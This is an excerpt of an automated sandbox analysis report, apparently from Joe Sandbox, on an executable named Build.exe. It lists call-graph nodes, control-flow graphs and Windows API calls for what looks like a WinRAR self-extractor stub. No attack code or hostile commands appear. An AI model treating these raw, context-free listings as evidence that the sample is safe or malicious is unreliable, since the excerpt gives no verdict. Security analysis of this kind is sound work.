b52914 GetModuleHandleW 26119->26120 26121 b52943 GetProcAddress 26120->26121 26122 b52999 26120->26122 26124 b52955 26121->26124 26125 b5296d GetProcAddress 26121->26125 26123 b52cda 26122->26123 26225 b69e7e 42 API calls __vsnwprintf_l 26122->26225 26126 b52cdc GetModuleFileNameW 26123->26126 26124->26125 26125->26122 26128 b5297f 26125->26128 26137 b52cfa 26126->26137 26128->26122 26129 b52c06 26129->26126 26130 b52c13 GetModuleFileNameW CreateFileW 26129->26130 26131 b52c47 SetFilePointer 26130->26131 26132 b52ccc CloseHandle 26130->26132 26131->26132 26133 b52c55 ReadFile 26131->26133 26132->26126 26133->26132 26134 b52c73 26133->26134 26136 b52ede 26134->26136 26141 b52c85 26134->26141 26135 b4d076 6 API calls 26135->26137 26228 b613f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 26136->26228 26137->26135 26140 b528ab 7 API calls 26137->26140 26142 b52d5c GetFileAttributesW 26137->26142 26144 b52d74 26137->26144 26139 b52ee3 26140->26137 26141->26132 26143 b528ab 7 API calls 26141->26143 26142->26137 26142->26144 26143->26141 26145 b52db4 26144->26145 26146 b52d7f 26144->26146 26147 b52ec3 26145->26147 26148 b52dbc 26145->26148 26150 b52d98 GetFileAttributesW 26146->26150 26153 b52db0 26146->26153 26149 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26147->26149 26152 b4d076 6 API calls 26148->26152 26151 b52ed5 26149->26151 26150->26146 26150->26153 26173 b5c5dd GetCurrentDirectoryW 26151->26173 26154 b52dce 26152->26154 26153->26145 26155 b52dd5 26154->26155 26156 b52e3b 26154->26156 26158 b528ab 7 API calls 26155->26158 26157 b44c00 _swprintf 51 API calls 26156->26157 26159 b52e63 AllocConsole 26157->26159 26160 b52ddf 26158->26160 26161 b52e70 GetCurrentProcessId AttachConsole 26159->26161 26162 b52ebb ExitProcess 26159->26162 26163 b528ab 7 API calls 26160->26163 26226 b66433 26161->26226 26165 b52de9 26163->26165 26167 b50597 53 API calls 26165->26167 26166 b52e91 GetStdHandle WriteConsoleW Sleep FreeConsole 26166->26162 26168 b52e04 26167->26168 26169 b44c00 _swprintf 51 API calls 26168->26169 26170 b52e17 26169->26170 26171 b50597 53 API calls 26170->26171 26172 b52e26 26171->26172 26172->26162 26173->25955 26175 b528ab 7 API calls 26174->26175 26176 b5cced OleInitialize 26175->26176 26177 b5cd10 GdiplusStartup SHGetMalloc 26176->26177 26177->25957 26183 b5e87c 26178->26183 26179 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26180 b5e9b1 26179->26180 26180->25966 26180->25967 26181 b54159 CharUpperW 26181->26183 26182 b5e9a0 26182->26179 26183->26181 26183->26182 26184 b51421 82 API calls 26183->26184 26184->26183 26186 b61590 26185->26186 26187 b5ffea SetEnvironmentVariableW 26186->26187 26188 b60016 26187->26188 26189 b6003e 26188->26189 26192 b60032 SetEnvironmentVariableW 26188->26192 26190 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26189->26190 26191 b60049 26190->26191 26191->25959 26192->26189 26194 b5d9fe 26193->26194 26195 b5da0b GetObjectW 26193->26195 26229 b5c652 FindResourceW 26194->26229 26197 b5da1a 26195->26197 26199 b5c556 4 API calls 26197->26199 26200 b5da2d 26199->26200 26201 b5da70 26200->26201 26202 b5da4c 26200->26202 26203 b5c652 12 API calls 26200->26203 26212 b4f93e 26201->26212 26243 b5c595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26202->26243 26205 b5da3d 26203->26205 26205->26202 26207 b5da43 DeleteObject 26205->26207 26206 b5da54 26244 b5c574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26206->26244 26207->26202 26209 b5da5d 26245 b5c79c 13 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 26209->26245 26211 b5da64 DeleteObject 26211->26201 26254 b4f963 26212->26254 26217 b5afe6 26218 b6121c 27 API calls 26217->26218 26219 b5b005 26218->26219 26219->25980 26221 b5cd78 GdiplusShutdown OleUninitialize 26220->26221 26221->25999 26223->25991 26224->25997 26225->26129 26227 b6643b 26226->26227 26227->26166 26227->26227 26228->26139 26230 b5c675 SizeofResource 26229->26230 26234 b5c763 26229->26234 26231 b5c68c LoadResource 26230->26231 26230->26234 26232 b5c6a1 LockResource 26231->26232 26231->26234 26233 b5c6b2 GlobalAlloc 26232->26233 26232->26234 26233->26234 26235 b5c6cd GlobalLock 26233->26235 26234->26195 26234->26197 26236 b5c75c GlobalFree 26235->26236 26237 b5c6dc __InternalCxxFrameHandler 26235->26237 26236->26234 26238 b5c755 GlobalUnlock 26237->26238 26246 b5c5b6 GdipAlloc 26237->26246 26238->26236 26241 b5c740 26241->26238 26242 b5c72a GdipCreateHBITMAPFromBitmap 26242->26241 26243->26206 26244->26209 26245->26211 26247 b5c5c8 26246->26247 26249 b5c5d5 26246->26249 26250 b5c34d 26247->26250 26249->26238 26249->26241 26249->26242 26251 b5c375 GdipCreateBitmapFromStream 26250->26251 26252 b5c36e GdipCreateBitmapFromStreamICM 26250->26252 26253 b5c37a 26251->26253 26252->26253 26253->26249 26255 b4f975 26254->26255 26256 b4f9cb GetModuleFileNameW 26255->26256 26257 b4f9f8 26255->26257 26258 b4f9df 26256->26258 26308 b4b2b0 26257->26308 26258->26257 26260 b4fa47 26321 b68bc0 26260->26321 26261 b4af2f 80 API calls 26263 b50192 26261->26263 26262 b501bd 78 API calls 26265 b4fa1b 26262->26265 26266 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26263->26266 26265->26260 26265->26262 26280 b4fc4f 26265->26280 26268 b4f94a 26266->26268 26267 b4fa5a 26269 b68bc0 26 API calls 26267->26269 26306 b501fa GetModuleHandleW FindResourceW 26268->26306 26277 b4fa6c ___vcrt_FlsSetValue 26269->26277 26270 b4fb92 26270->26280 26341 b4b7b0 81 API calls 26270->26341 26271 b4b8c0 79 API calls 26271->26277 26274 b4fba9 ___std_exception_copy 26275 b4b610 82 API calls 26274->26275 26274->26280 26278 b4fbcf ___std_exception_copy 26275->26278 26277->26270 26277->26271 26277->26280 26335 b4b610 26277->26335 26340 b4b7b0 81 API calls 26277->26340 26278->26280 26304 b4fbda ___vcrt_FlsSetValue _wcslen ___std_exception_copy 26278->26304 26342 b53d10 MultiByteToWideChar 26278->26342 26280->26261 26282 b4ffed 26298 b4fd76 26282->26298 26345 b6b52e 26 API calls 2 library calls 26282->26345 26284 b500b6 26349 b69ea8 26 API calls 2 library calls 26284->26349 26286 b5010e 26350 b501d8 78 API calls 26286->26350 26287 b50126 26288 b5015c 26287->26288 26292 b501bd 78 API calls 26287->26292 26289 b68bc0 26 API calls 26288->26289 26291 b50175 26289->26291 26293 b68bc0 26 API calls 26291->26293 26292->26287 26293->26280 26294 b5000c 26346 b69ea8 26 API calls 2 library calls 26294->26346 26296 b50064 26347 b501d8 78 API calls 26296->26347 26298->26287 26348 b6b52e 26 API calls 2 library calls 26298->26348 26299 b501b7 26351 b613f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 26299->26351 26300 b53f47 WideCharToMultiByte 26300->26304 26302 b501bc 26304->26280 26304->26282 26304->26298 26304->26299 26304->26300 26343 b50531 50 API calls __vsnprintf 26304->26343 26344 b68a01 26 API calls 3 library calls 26304->26344 26307 b4f951 26306->26307 26307->26217 26309 b4b2ba 26308->26309 26310 b4b334 CreateFileW 26309->26310 26311 b4b34f GetLastError 26310->26311 26314 b4b39b 26310->26314 26312 b4da1e 6 API calls 26311->26312 26313 b4b36c 26312->26313 26313->26314 26316 b4b370 CreateFileW GetLastError 26313->26316 26315 b4b3df 26314->26315 26317 b4b3c5 SetFileTime 26314->26317 26319 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26315->26319 26316->26314 26318 b4b395 26316->26318 26317->26315 26318->26314 26320 b4b41e 26319->26320 26320->26265 26322 b68bf9 26321->26322 26323 b68bfd 26322->26323 26334 b68c25 26322->26334 26352 b6bc7b 20 API calls _abort 26323->26352 26325 b68f49 26327 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26325->26327 26326 b68c02 26353 b66649 26 API calls __cftof 26326->26353 26329 b68f56 26327->26329 26329->26267 26330 b68c0d 26331 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26330->26331 26333 b68c19 26331->26333 26333->26267 26334->26325 26354 b68ae0 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 26334->26354 26336 b4b61c 26335->26336 26339 b4b623 26335->26339 26336->26277 26338 b4b151 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26338->26339 26339->26336 26339->26338 26355 b47c95 77 API calls 26339->26355 26340->26277 26341->26274 26342->26304 26343->26304 26344->26304 26345->26294 26346->26296 26347->26298 26348->26284 26349->26286 26350->26287 26351->26302 26352->26326 26353->26330 26354->26334 26355->26339 26357 b6a533 _abort 26356->26357 26358 b6a54c 26357->26358 26359 b6a53a 26357->26359 26380 b6d281 EnterCriticalSection 26358->26380 26395 b6a681 GetModuleHandleW 26359->26395 26362 b6a53f 26362->26358 26396 b6a6c5 GetModuleHandleExW 26362->26396 26363 b6a5f1 26384 b6a631 26363->26384 26366 b6a553 26366->26363 26368 b6a5c8 26366->26368 26381 b6b040 26366->26381 26372 b6a5e0 26368->26372 26377 b6b2f1 _abort 5 API calls 26368->26377 26370 b6a60e 26387 b6a640 26370->26387 26371 b6a63a 26404 b749b0 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 26371->26404 26373 b6b2f1 _abort 5 API calls 26372->26373 26373->26363 26377->26372 26380->26366 26405 b6ad79 26381->26405 26424 b6d2d1 LeaveCriticalSection 26384->26424 26386 b6a60a 26386->26370 26386->26371 26425 b6d6c6 26387->26425 26390 b6a66e 26392 b6a6c5 _abort 8 API calls 26390->26392 26391 b6a64e GetPEB 26391->26390 26393 b6a65e GetCurrentProcess TerminateProcess 26391->26393 26394 b6a676 ExitProcess 26392->26394 26393->26390 26395->26362 26397 b6a712 26396->26397 26398 b6a6ef GetProcAddress 26396->26398 26399 b6a721 26397->26399 26400 b6a718 FreeLibrary 26397->26400 26401 b6a704 26398->26401 26402 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26399->26402 26400->26399 26401->26397 26403 b6a54b 26402->26403 26403->26358 26408 b6ad28 26405->26408 26407 b6ad9d 26407->26368 26409 b6ad34 ___scrt_is_nonwritable_in_current_image 26408->26409 26416 b6d281 EnterCriticalSection 26409->26416 26411 b6ad42 26417 b6adc9 26411->26417 26415 b6ad60 _abort 26415->26407 26416->26411 26418 b6ade9 26417->26418 26421 b6adf1 26417->26421 26419 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26418->26419 26420 b6ad4f 26419->26420 26423 b6ad6d LeaveCriticalSection _abort 26420->26423 26421->26418 26422 b6bafa _free 20 API calls 26421->26422 26422->26418 26423->26415 26424->26386 26426 b6d6eb 26425->26426 26428 b6d6e1 26425->26428 26427 b6d2e8 _abort 5 API calls 26426->26427 26427->26428 26429 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26428->26429 26430 b6a64a 26429->26430 26430->26390 26430->26391 26672 b5c3d0 GdipCloneImage GdipAlloc 26673 b5b3d0 6 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 26674 b6a7c0 52 API calls 3 library calls 26675 b61bc0 27 API calls 26604 b755c0 VariantClear 26606 b6e530 GetCommandLineA GetCommandLineW 26678 b64f20 6 API calls 4 library calls 26683 b6531b 38 API calls 4 library calls 26612 b61d07 29 API calls _abort 26615 b60900 14 API calls ___delayLoadHelper2@8 26685 b61b00 46 API calls __RTC_Initialize 24671 b6030b 24672 b60318 24671->24672 24681 b50597 24672->24681 24679 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24680 b60378 24679->24680 24682 b505a7 24681->24682 24693 b505c8 24682->24693 24685 b44c00 24720 b44bd3 24685->24720 24688 b5d864 PeekMessageW 24689 b5d87f GetMessageW 24688->24689 24690 b5d8b8 24688->24690 24691 b5d895 IsDialogMessageW 24689->24691 24692 b5d8a4 TranslateMessage DispatchMessageW 24689->24692 24690->24679 24691->24690 24691->24692 24692->24690 24699 b4f892 24693->24699 24696 b505c5 24696->24685 24697 b505eb LoadStringW 24697->24696 24698 b50602 LoadStringW 24697->24698 24698->24696 24706 b4f7b8 24699->24706 24703 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24705 b4f8e8 24703->24705 24704 b4f8d3 24704->24703 24705->24696 24705->24697 24707 b4f7e1 24706->24707 24715 b4f85d _strncpy 24706->24715 24711 b4f801 24707->24711 24717 b53f47 WideCharToMultiByte 24707->24717 24709 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24710 b4f88b 24709->24710 24710->24704 24716 b4f8ec 26 API calls 24710->24716 24714 b4f832 24711->24714 24718 b50531 50 API calls __vsnprintf 24711->24718 24719 b68a01 26 API calls 3 library calls 24714->24719 24715->24709 24716->24704 24717->24711 24718->24714 24719->24715 24721 b44bea __vsnwprintf_l 24720->24721 24724 b68772 24721->24724 24727 b66835 24724->24727 24728 b66875 24727->24728 24729 b6685d 24727->24729 24728->24729 24730 b6687d 24728->24730 24744 b6bc7b 20 API calls _abort 24729->24744 24732 b66dd4 __cftof 38 API calls 24730->24732 24734 b6688d 24732->24734 24733 b66862 24745 b66649 26 API calls __cftof 24733->24745 24746 b66d9f 20 API calls 2 library calls 24734->24746 24737 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24739 b44bf4 SetDlgItemTextW 24737->24739 24738 b66905 24747 b67184 51 API calls 4 library calls 24738->24747 24739->24688 24742 b6686d 24742->24737 24743 b66910 24748 b66e57 20 API calls _free 24743->24748 24744->24733 24745->24742 24746->24738 24747->24743 24748->24742 26686 b46b70 41 API calls __EH_prolog3 26687 b6dafe 27 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 26688 b5ea83 131 API calls 5 library calls 26690 b5d361 78 API calls 26619 b5e560 91 API calls 2 library calls 26624 b5f950 70 API calls 26625 b6b150 7 API calls ___scrt_uninitialize_crt 26626 b61d50 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 26627 b6cd50 21 API calls 26692 b6d750 FreeLibrary 26694 b59740 132 API calls 26630 b53d49 7 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 359 b5ea07-b5ea55 call b61590 362 b5f717-b5f739 call b610f9 359->362 363 b5ea5b-b5ea81 call b5d5dd 359->363 368 b5ea83 363->368 368->362 369 b5ea89-b5ea9d 368->369 370 b5ea9e-b5eab3 call b5d148 369->370 373 b5eab5 370->373 374 b5eab7-b5eacc call b54168 373->374 377 b5eace-b5ead2 374->377 378 b5ead9-b5eadc 374->378 377->374 379 b5ead4 377->379 380 b5eae2 378->380 381 b5f6ea-b5f712 call b5d5dd 378->381 379->381 383 b5ed6d-b5ed6f 380->383 384 b5ed4f-b5ed51 380->384 385 b5ecae-b5ecb0 380->385 386 b5eae9-b5eaec 380->386 381->368 383->381 389 b5ed75-b5ed7c 383->389 384->381 388 b5ed57-b5ed68 SetWindowTextW 384->388 385->381 390 b5ecb6-b5ecc2 385->390 386->381 391 b5eaf2-b5eb46 call b5c5dd call b4dd18 call b4c351 call b4c48b call b47eed 386->391 388->381 389->381 392 b5ed82-b5ed9b 389->392 393 b5ecc4-b5ecd5 call b69f09 390->393 394 b5ecd6-b5ecdb 390->394 446 b5ec85-b5ec97 call b4c3de 391->446 396 b5eda3-b5edb1 call b66433 392->396 397 b5ed9d 392->397 393->394 400 b5ece5-b5ecf0 call b5d76e 394->400 401 b5ecdd-b5ece3 394->401 396->381 414 b5edb7-b5edc0 396->414 397->396 406 b5ecf5-b5ecf7 400->406 401->406 408 b5ed02-b5ed22 call b66433 call b666ae 406->408 409 b5ecf9-b5ed00 call b66433 406->409 435 b5ed24-b5ed2b 408->435 436 b5ed3b-b5ed3d 408->436 409->408 419 b5edc2-b5edc6 414->419 420 b5ede9-b5edec 414->420 423 b5edf2-b5edf5 419->423 425 b5edc8-b5edd0 419->425 422 b5eee4-b5eef2 call b5268b 420->422 420->423 439 b5eef4-b5ef08 call b64b4e 422->439 429 b5edf7-b5edfc 423->429 430 b5ee02-b5ee1d 423->430 425->381 426 b5edd6-b5ede4 call b5268b 425->426 426->439 429->422 429->430 447 b5ee1f-b5ee5a 430->447 448 b5ee7a-b5ee81 430->448 442 b5ed32-b5ed3a call b69f09 435->442 443 b5ed2d-b5ed2f 435->443 436->381 437 b5ed43-b5ed4a call b666a9 436->437 437->381 458 b5ef15-b5ef66 call b5268b call b5d41c GetDlgItem SetWindowTextW SendMessageW call b68796 439->458 459 b5ef0a-b5ef0e 439->459 442->436 443->442 462 b5ec9d-b5eca9 call b4c367 446->462 463 b5eb4b-b5eb5f SetFileAttributesW 446->463 481 b5ee5c-b5ee63 447->481 482 b5ee6b 447->482 452 b5ee83-b5ee9b call b66433 448->452 453 b5eeaf-b5eed2 call b66433 * 2 448->453 452->453 471 b5ee9d-b5eeaa call b52663 452->471 453->439 487 b5eed4-b5eee2 call b52663 453->487 498 b5ef6b-b5ef6f 458->498 459->458 465 b5ef10-b5ef12 459->465 462->381 469 b5ec05-b5ec15 GetFileAttributesW 463->469 470 b5eb65-b5eb98 call b4d8ac call b4d52f call b66433 463->470 465->458 469->446 478 b5ec17-b5ec26 DeleteFileW 469->478 507 b5ebab-b5ebb9 call b4dcd9 470->507 508 b5eb9a-b5eba9 call b66433 470->508 471->453 478->446 485 b5ec28-b5ec2b 478->485 488 b5f73c-b5f741 call b613f9 481->488 489 b5ee69 481->489 483 b5ee70-b5ee72 482->483 483->448 492 b5ec2f-b5ec5b call b44c00 GetFileAttributesW 485->492 487->439 489->483 503 b5ec2d-b5ec2e 492->503 504 b5ec5d-b5ec73 MoveFileW 492->504 498->381 502 b5ef75-b5ef89 SendMessageW 498->502 502->381 503->492 504->446 506 b5ec75-b5ec7f MoveFileExW 504->506 506->446 507->462 513 b5ebbf-b5ebfe call b66433 call b62640 507->513 508->507 508->513 513->469
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B5D5DD: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B5D6C7
                                                                                                                                                                                  • Part of subcall function 00B5C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B5C5E5
                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000800,?,CEEE5757,?,00000000,00000001), ref: 00B5EB53
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B5EB8D
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B5EBA1
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B5EBC6
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00B5EC0C
                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00B5EC1E
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B5EC43
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00B5EC52
                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00B5EC6B
                                                                                                                                                                                • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00B5EC7F
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B5ECFA
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B5ED03
                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00B5ED62
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$_wcslen$Attributes$Move$CurrentDeleteDirectoryEnvironmentExpandStringsTextWindow_swprintf
                                                                                                                                                                                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                • API String ID: 2983673336-312220925
                                                                                                                                                                                • Opcode ID: 38cc530877dd6fc95d78e97c3ca4401c63888e232ecc479bb4fb5f7ee9af0159
                                                                                                                                                                                • Instruction ID: 93d1a8833cd60b1137fc49cf4cc471bed37f641dc49563445800a0abb0273558
                                                                                                                                                                                • Opcode Fuzzy Hash: 38cc530877dd6fc95d78e97c3ca4401c63888e232ecc479bb4fb5f7ee9af0159
                                                                                                                                                                                • Instruction Fuzzy Hash: 94F14B72900249AADB25EFA0DC95BEF37ECEB09311F0405AAED19D7190EF749B49CB50

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B5290A: GetModuleHandleW.KERNEL32 ref: 00B52937
                                                                                                                                                                                  • Part of subcall function 00B5290A: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B52949
                                                                                                                                                                                  • Part of subcall function 00B5290A: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B52973
                                                                                                                                                                                  • Part of subcall function 00B5C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B5C5E5
                                                                                                                                                                                  • Part of subcall function 00B5CCD9: OleInitialize.OLE32(00000000), ref: 00B5CCF2
                                                                                                                                                                                  • Part of subcall function 00B5CCD9: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B5CD29
                                                                                                                                                                                  • Part of subcall function 00B5CCD9: SHGetMalloc.SHELL32(00B8C460), ref: 00B5CD33
                                                                                                                                                                                • GetCommandLineW.KERNEL32 ref: 00B603C9
                                                                                                                                                                                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B603F3
                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00B60404
                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00B60455
                                                                                                                                                                                  • Part of subcall function 00B5FFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B5FFFE
                                                                                                                                                                                  • Part of subcall function 00B5FFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B60038
                                                                                                                                                                                  • Part of subcall function 00B51421: _wcslen.LIBCMT ref: 00B51445
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00B6045C
                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe,00000800), ref: 00B60476
                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe), ref: 00B60482
                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00B6048D
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B604E1
                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B604F6
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00B604FD
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000064), ref: 00B60514
                                                                                                                                                                                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00B60565
                                                                                                                                                                                • Sleep.KERNEL32(?), ref: 00B60593
                                                                                                                                                                                • DeleteObject.GDI32 ref: 00B605CC
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00B605DC
                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00B6061F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                                                                                                                                                                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                                • API String ID: 3014515783-3227824
                                                                                                                                                                                • Opcode ID: 8ce16c6a566de228f0868fead4f9a80075f1a3006270fe8636bcfecd84237536
                                                                                                                                                                                • Instruction ID: 19c839e30baccdedd1959878f4067b68373009cb0b3db3cdcb9deb7c62f2c4dc
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ce16c6a566de228f0868fead4f9a80075f1a3006270fe8636bcfecd84237536
                                                                                                                                                                                • Instruction Fuzzy Hash: 38710571504340AFD320BB75DC4AF6B7BE8EB45741F0444A9F949932A2EF398988CB61

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 606 b5c652-b5c66f FindResourceW 607 b5c675-b5c686 SizeofResource 606->607 608 b5c76b 606->608 607->608 610 b5c68c-b5c69b LoadResource 607->610 609 b5c76d-b5c771 608->609 610->608 611 b5c6a1-b5c6ac LockResource 610->611 611->608 612 b5c6b2-b5c6c7 GlobalAlloc 611->612 613 b5c763-b5c769 612->613 614 b5c6cd-b5c6d6 GlobalLock 612->614 613->609 615 b5c75c-b5c75d GlobalFree 614->615 616 b5c6dc-b5c6fa call b64250 614->616 615->613 620 b5c755-b5c756 GlobalUnlock 616->620 621 b5c6fc-b5c71e call b5c5b6 616->621 620->615 621->620 626 b5c720-b5c728 621->626 627 b5c743-b5c751 626->627 628 b5c72a-b5c73e GdipCreateHBITMAPFromBitmap 626->628 627->620 628->627 629 b5c740 628->629 629->627
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C665
                                                                                                                                                                                • SizeofResource.KERNEL32(00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C67C
                                                                                                                                                                                • LoadResource.KERNEL32(00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C693
                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,?,?,00B5DA3D,00000066), ref: 00B5C6A2
                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B5DA3D,00000066), ref: 00B5C6BD
                                                                                                                                                                                • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00B5DA3D,00000066), ref: 00B5C6CE
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00B5C756
                                                                                                                                                                                  • Part of subcall function 00B5C5B6: GdipAlloc.GDIPLUS(00000010), ref: 00B5C5BC
                                                                                                                                                                                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B5C737
